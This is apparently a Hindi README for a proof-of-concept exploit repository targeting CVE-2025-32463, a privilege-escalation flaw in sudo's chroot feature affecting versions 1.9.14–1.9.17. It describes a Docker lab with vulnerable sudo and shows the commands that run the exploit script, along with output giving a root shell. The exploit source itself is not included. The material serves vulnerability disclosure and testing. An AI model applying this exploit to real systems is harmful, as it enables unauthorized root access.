
CVE-2025-32463 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, sudo के chroot फीचर में एक विशेषाधिकार-वृद्धि भेद्यता। इसमें Docker वातावरण और रूट शेल उत्पन्न करने के लिए एक्सप्लॉइट स्क्रिप्ट शामिल है।
यह रिपॉजिटरी sudo के chroot फीचर में CVE‑2025‑32463 विशेषाधिकार-वृद्धि दोष को प्रदर्शित करने के लिए एक न्यूनतम, पुनरुत्पादक वातावरण प्रदान करता है।
| फ़ाइल | उद्देश्य |
|---|---|
| Dockerfile | एक Ubuntu 24.04 इमेज बनाता है जिसमें कमजोर sudo 1.9.16p2 और बिल्ड टूल्स हैं |
| sudo‑chwoot.sh | chroot के अंदर एक रूट शेल उत्पन्न करने वाला अवधारणा-सिद्धि एक्सप्लॉइट |
| run.sh | सहायक स्क्रिप्ट जो इमेज बनाती है (यदि आवश्यक हो) और एक्सप्लॉइट कंटेनर लॉन्च करती है |
अधिकांश लिनक्स वितरणों पर sudo 1.9.14 से 1.9.17 (सभी p‑revisions) के कमजोर बिल्ड प्रभावित होते हैं।
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (drops you into a root shell)
pwn@0da3726bd81f:~$ ./sudo-chwoot.sh
woot!
root@0da3726bd81f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
run.sh Docker को --privileged और --rm पास करता है ताकि बाहर निकलने पर कंटेनर स्वयं साफ हो जाए।
जब आपका काम पूरा हो जाए तो इमेज हटाएँ:
docker rmi sudo-chwoot